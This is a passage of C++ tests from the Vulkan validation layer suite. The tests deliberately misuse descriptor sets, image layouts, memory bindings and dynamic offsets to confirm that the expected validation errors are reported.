bindStateFragSamplerShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; VkCommandBufferObj cmd_buf(m_device, m_commandPool); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &cmd_buf.handle(); enum TestType { kInternal, // Image layout mismatch is *within* a given command buffer kExternal // Image layout mismatch is with the current state of the image, found at QueueSubmit }; std::array<TestType, 2> test_list = {kInternal, kExternal}; const std::vector<std::string> internal_errors = {"VUID-VkDescriptorImageInfo-imageLayout-00344", "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotUpdated"}; const std::vector<std::string> external_errors = {"UNASSIGNED-CoreValidation-DrawState-InvalidImageLayout"}; // Common steps to create the two classes of errors (or two classes of positives) auto do_test = [&](VkImageObj *image, vk_testing::ImageView *view, VkImageAspectFlags aspect_mask, VkImageLayout image_layout, VkImageLayout descriptor_layout, const bool positive_test) { // Set up the descriptor img_info.imageView = view->handle(); img_info.imageLayout = descriptor_layout; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); for (TestType test_type : test_list) { cmd_buf.begin(); // record layout different than actual descriptor layout. 
const VkFlags read_write = VK_ACCESS_MEMORY_READ_BIT | VK_ACCESS_MEMORY_WRITE_BIT; auto image_barrier = image->image_memory_barrier(read_write, read_write, VK_IMAGE_LAYOUT_UNDEFINED, image_layout, image->subresource_range(aspect_mask)); cmd_buf.PipelineBarrier(VK_PIPELINE_STAGE_ALL_GRAPHICS_BIT, VK_PIPELINE_STAGE_ALL_GRAPHICS_BIT, 0, 0, nullptr, 0, nullptr, 1, &image_barrier); if (test_type == kExternal) { // The image layout is external to the command buffer we are recording to test. Submit to push to instance scope. cmd_buf.end(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); cmd_buf.begin(); } cmd_buf.BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(cmd_buf.handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(cmd_buf.handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(cmd_buf.handle(), 0, 1, &viewport); vk::CmdSetScissor(cmd_buf.handle(), 0, 1, &scissor); // At draw time the update layout will mis-match the actual layout if (positive_test || (test_type == kExternal)) { m_errorMonitor->ExpectSuccess(); } else { for (const auto &err : internal_errors) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err.c_str()); } } cmd_buf.Draw(1, 0, 0, 0); if (positive_test || (test_type == kExternal)) { m_errorMonitor->VerifyNotFound(); } else { m_errorMonitor->VerifyFound(); } m_errorMonitor->ExpectSuccess(); cmd_buf.EndRenderPass(); cmd_buf.end(); m_errorMonitor->VerifyNotFound(); // Submit cmd buffer if (positive_test || (test_type == kInternal)) { m_errorMonitor->ExpectSuccess(); } else { for (const auto &err : external_errors) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err.c_str()); } } vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); if (positive_test || (test_type == kInternal)) { m_errorMonitor->VerifyNotFound(); } else { m_errorMonitor->VerifyFound(); } } }; do_test(&image, &view, VK_IMAGE_ASPECT_COLOR_BIT, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, /* positive */ false); // Create depth stencil image and views const VkFormat format_ds = m_depth_stencil_fmt = FindSupportedDepthStencilFormat(gpu()); bool ds_test_support = maint2_support && (format_ds != VK_FORMAT_UNDEFINED); VkImageObj image_ds(m_device); vk_testing::ImageView stencil_view; vk_testing::ImageView depth_view; const VkImageLayout ds_image_layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL; const VkImageLayout depth_descriptor_layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; const VkImageLayout stencil_descriptor_layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; const VkImageAspectFlags depth_stencil = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; if (ds_test_support) { image_ds.Init(32, 32, 1, format_ds, VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image_ds.initialized()); auto ds_view_ci = SafeSaneImageViewCreateInfo(image_ds, format_ds, VK_IMAGE_ASPECT_DEPTH_BIT); depth_view.init(*m_device, ds_view_ci); ds_view_ci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_STENCIL_BIT; stencil_view.init(*m_device, ds_view_ci); do_test(&image_ds, &depth_view, depth_stencil, ds_image_layout, depth_descriptor_layout, /* positive */ true); do_test(&image_ds, &depth_view, depth_stencil, ds_image_layout, 
VK_IMAGE_LAYOUT_GENERAL, /* positive */ false); do_test(&image_ds, &stencil_view, depth_stencil, ds_image_layout, stencil_descriptor_layout, /* positive */ true); do_test(&image_ds, &stencil_view, depth_stencil, ds_image_layout, VK_IMAGE_LAYOUT_GENERAL, /* positive */ false); } } TEST_F(VkLayerTest, DescriptorPoolInUseResetSignaled) { TEST_DESCRIPTION("Reset a DescriptorPool with a DescriptorSet that is in use."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create image to update the descriptor with VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageView view = image.targetView(VK_FORMAT_B8G8R8A8_UNORM); // Create Sampler VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkResult err = vk::CreateSampler(m_device->device(), &sampler_ci, nullptr, &sampler); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler descriptor_set.WriteDescriptorImageInfo(0, view, sampler); descriptor_set.UpdateDescriptorSets(); // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragSamplerShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, nullptr); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Submit cmd buffer to put pool in-flight VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); // Reset pool while in-flight, causing error m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkResetDescriptorPool-descriptorPool-00313"); vk::ResetDescriptorPool(m_device->device(), descriptor_set.pool_, 0); m_errorMonitor->VerifyFound(); vk::QueueWaitIdle(m_device->m_queue); // Cleanup vk::DestroySampler(m_device->device(), sampler, nullptr); m_errorMonitor->SetUnexpectedError( "If descriptorPool is not VK_NULL_HANDLE, descriptorPool must be a valid VkDescriptorPool handle"); m_errorMonitor->SetUnexpectedError("Unable to remove DescriptorPool obj"); } TEST_F(VkLayerTest, DescriptorImageUpdateNoMemoryBound) { TEST_DESCRIPTION("Attempt an image descriptor set update where image's bound memory has been freed."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); 
ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create images to update the descriptor with VkImage image; const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; const int32_t tex_width = 32; const int32_t tex_height = 32; VkImageCreateInfo image_create_info = {}; image_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO; image_create_info.pNext = NULL; image_create_info.imageType = VK_IMAGE_TYPE_2D; image_create_info.format = tex_format; image_create_info.extent.width = tex_width; image_create_info.extent.height = tex_height; image_create_info.extent.depth = 1; image_create_info.mipLevels = 1; image_create_info.arrayLayers = 1; image_create_info.samples = VK_SAMPLE_COUNT_1_BIT; image_create_info.tiling = VK_IMAGE_TILING_OPTIMAL; image_create_info.usage = VK_IMAGE_USAGE_SAMPLED_BIT; image_create_info.flags = 0; VkResult err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image); ASSERT_VK_SUCCESS(err); // Initially bind memory to avoid error at bind view time. We'll break binding before update. VkMemoryRequirements memory_reqs; VkDeviceMemory image_memory; bool pass; VkMemoryAllocateInfo memory_info = {}; memory_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; memory_info.pNext = NULL; memory_info.allocationSize = 0; memory_info.memoryTypeIndex = 0; vk::GetImageMemoryRequirements(m_device->device(), image, &memory_reqs); // Allocate enough memory for image memory_info.allocationSize = memory_reqs.size; pass = m_device->phy().set_memory_type(memory_reqs.memoryTypeBits, &memory_info, 0); ASSERT_TRUE(pass); err = vk::AllocateMemory(m_device->device(), &memory_info, NULL, &image_memory); ASSERT_VK_SUCCESS(err); err = vk::BindImageMemory(m_device->device(), image, image_memory, 0); ASSERT_VK_SUCCESS(err); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image; image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView view; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler descriptor_set.WriteDescriptorImageInfo(0, view, sampler); // Break memory binding and attempt update vk::FreeMemory(m_device->device(), image_memory, nullptr); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " previously bound memory was freed. 
Memory must not be freed prior to this operation."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkUpdateDescriptorSets() failed write update validation for "); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); // Cleanup vk::DestroyImage(m_device->device(), image, NULL); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroyImageView(m_device->device(), view, NULL); } TEST_F(VkLayerTest, InvalidDynamicOffsetCases) { // Create a descriptorSet w/ dynamic descriptor and then hit 3 offset error // cases: // 1. No dynamicOffset supplied // 2. Too many dynamicOffsets supplied // 3. Dynamic offset oversteps buffer being updated m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " requires 1 dynamicOffsets, but only 0 dynamicOffsets are left in pDynamicOffsets "); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBufferObj dynamic_uniform_buffer; dynamic_uniform_buffer.init(*m_device, buffCI); // Correctly update descriptor to avoid "NOT_UPDATED" error descriptor_set.WriteDescriptorBufferInfo(0, dynamic_uniform_buffer.handle(), 1024, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC); descriptor_set.UpdateDescriptorSets(); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 0, NULL); m_errorMonitor->VerifyFound(); uint32_t pDynOff[2] = {512, 756}; // Now cause error b/c too many dynOffsets in array for # of dyn descriptors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "Attempting to bind 1 descriptorSets with 1 dynamic descriptors, but "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 2, pDynOff); m_errorMonitor->VerifyFound(); // Finally cause error due to dynamicOffset being too big m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, " dynamic offset 512 combined with offset 0 and range 1024 that oversteps the buffer size of 1024"); // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragUniformShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); VkViewport viewport = {0, 0, 16, 16, 0, 1}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); // This update should succeed, but offset size of 512 will overstep buffer // /w range 1024 & size 1024 
vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptor_set.set_, 1, pDynOff); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } TEST_F(VkLayerTest, DescriptorBufferUpdateNoMemoryBound) { TEST_DESCRIPTION("Attempt to update a descriptor with a non-sparse buffer that doesn't have memory bound"); VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " used with no memory bound. Memory should be bound by calling vkBindBufferMemory()."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkUpdateDescriptorSets() failed write update validation for "); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBuffer dynamic_uniform_buffer; err = vk::CreateBuffer(m_device->device(), &buffCI, NULL, &dynamic_uniform_buffer); ASSERT_VK_SUCCESS(err); // Attempt to update descriptor without binding memory to it descriptor_set.WriteDescriptorBufferInfo(0, dynamic_uniform_buffer, 1024, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroyBuffer(m_device->device(), dynamic_uniform_buffer, NULL); } TEST_F(VkLayerTest, DescriptorSetCompatibility) { // Test various desriptorSet errors with bad binding combinations using std::vector; VkResult err; ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); static const uint32_t NUM_DESCRIPTOR_TYPES = 5; VkDescriptorPoolSize ds_type_count[NUM_DESCRIPTOR_TYPES] = {}; ds_type_count[0].type = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; ds_type_count[0].descriptorCount = 10; ds_type_count[1].type = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; ds_type_count[1].descriptorCount = 2; ds_type_count[2].type = VK_DESCRIPTOR_TYPE_STORAGE_IMAGE; ds_type_count[2].descriptorCount = 2; ds_type_count[3].type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count[3].descriptorCount = 5; // TODO : LunarG ILO driver currently asserts in desc.c w/ INPUT_ATTACHMENT // type // ds_type_count[4].type = VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT; ds_type_count[4].type = VK_DESCRIPTOR_TYPE_STORAGE_TEXEL_BUFFER; ds_type_count[4].descriptorCount = 2; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.maxSets = 5; ds_pool_ci.poolSizeCount = NUM_DESCRIPTOR_TYPES; ds_pool_ci.pPoolSizes = ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); static const uint32_t MAX_DS_TYPES_IN_LAYOUT = 2; VkDescriptorSetLayoutBinding dsl_binding[MAX_DS_TYPES_IN_LAYOUT] = {}; dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[0].descriptorCount = 5; dsl_binding[0].stageFlags = VK_SHADER_STAGE_ALL; dsl_binding[0].pImmutableSamplers = NULL; // Create layout identical to set0 layout but w/ different stageFlags 
VkDescriptorSetLayoutBinding dsl_fs_stage_only = {}; dsl_fs_stage_only.binding = 0; dsl_fs_stage_only.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_fs_stage_only.descriptorCount = 5; dsl_fs_stage_only.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; // Different stageFlags to cause error at // bind time dsl_fs_stage_only.pImmutableSamplers = NULL; vector<VkDescriptorSetLayoutObj> ds_layouts; // Create 4 unique layouts for full pipelineLayout, and 1 special fs-only // layout for error case ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); const VkDescriptorSetLayoutObj ds_layout_fs_only(m_device, {dsl_fs_stage_only}); dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; dsl_binding[0].descriptorCount = 2; dsl_binding[1].binding = 1; dsl_binding[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_IMAGE; dsl_binding[1].descriptorCount = 2; dsl_binding[1].stageFlags = VK_SHADER_STAGE_ALL; dsl_binding[1].pImmutableSamplers = NULL; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>({dsl_binding[0], dsl_binding[1]})); dsl_binding[0].binding = 0; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; dsl_binding[0].descriptorCount = 5; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_TEXEL_BUFFER; dsl_binding[0].descriptorCount = 2; ds_layouts.emplace_back(m_device, std::vector<VkDescriptorSetLayoutBinding>(1, dsl_binding[0])); const auto &ds_vk_layouts = MakeVkHandles<VkDescriptorSetLayout>(ds_layouts); static const uint32_t NUM_SETS = 4; VkDescriptorSet descriptorSet[NUM_SETS] = {}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorPool = ds_pool; alloc_info.descriptorSetCount = ds_vk_layouts.size(); alloc_info.pSetLayouts = ds_vk_layouts.data(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptorSet); ASSERT_VK_SUCCESS(err); VkDescriptorSet ds0_fs_only = {}; alloc_info.descriptorSetCount = 1; alloc_info.pSetLayouts = &ds_layout_fs_only.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &ds0_fs_only); ASSERT_VK_SUCCESS(err); const VkPipelineLayoutObj pipeline_layout(m_device, {&ds_layouts[0], &ds_layouts[1]}); // Create pipelineLayout with only one setLayout const VkPipelineLayoutObj single_pipe_layout(m_device, {&ds_layouts[0]}); // Create pipelineLayout with 2 descriptor setLayout at index 0 const VkPipelineLayoutObj pipe_layout_one_desc(m_device, {&ds_layouts[3]}); // Create pipelineLayout with 5 SAMPLER descriptor setLayout at index 0 const VkPipelineLayoutObj pipe_layout_five_samp(m_device, {&ds_layouts[2]}); // Create pipelineLayout with UB type, but stageFlags for FS only VkPipelineLayoutObj pipe_layout_fs_only(m_device, {&ds_layout_fs_only}); // Create pipelineLayout w/ incompatible set0 layout, but set1 is fine const VkPipelineLayoutObj pipe_layout_bad_set0(m_device, {&ds_layout_fs_only, &ds_layouts[1]}); // Add buffer binding for UBO uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 8; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer; buffer.init(*m_device, bci); VkDescriptorBufferInfo buffer_info; buffer_info.buffer = buffer.handle(); buffer_info.offset = 0; buffer_info.range = VK_WHOLE_SIZE; 
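    // VK_WHOLE_SIZE makes the descriptor's range run from 'offset' to the end of the bound buffer (8 bytes here).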
VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet[0]; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = &buffer_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO to be used for draw-time errors below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragUniformShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipe_layout_fs_only.handle(), renderPass()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); // TODO : Want to cause various binding incompatibility issues here to test // DrawState // First cause various verify_layout_compatibility() fails // Second disturb early and late sets and verify INFO msgs // VerifySetLayoutCompatibility fail cases: // 1. invalid VkPipelineLayout (layout) passed into vk::CmdBindDescriptorSets m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-layout-parameter"); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, CastToHandle<VkPipelineLayout, uintptr_t>(0xbaadb1be), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 2. layoutIndex exceeds # of layouts in layout m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " attempting to bind set to index 1"); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, single_pipe_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 3. Pipeline setLayout[0] has 2 descriptors, but set being bound has 5 // descriptors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " has 2 total descriptors, but "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_one_desc.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 4. same # of descriptors but mismatch in type m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " is type 'VK_DESCRIPTOR_TYPE_SAMPLER' but binding "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_five_samp.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 5. same # of descriptors but mismatch in stageFlags m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " has stageFlags VK_SHADER_STAGE_FRAGMENT_BIT but binding 0 for "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_fs_only.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // Now that we're done actively using the pipelineLayout that gfx pipeline // was created with, we should be able to delete it. Do that now to verify // that validation obeys pipelineLayout lifetime pipe_layout_fs_only.Reset(); // Cause draw-time errors due to PSO incompatibilities // 1. 
Error due to not binding required set (we actually use same code as // above to disturb set0) vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_bad_set0.handle(), 1, 1, &descriptorSet[1], 0, NULL); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " uses set #0 but that set is not bound."); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); // 2. Error due to bound set not being compatible with PSO's // VkPipelineLayout (diff stageFlags in this case) vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " bound as set #0 is not compatible with "); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdDraw-None-02697"); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); // Remaining clean-up m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, NullRenderPass) { // Bind a NULL RenderPass 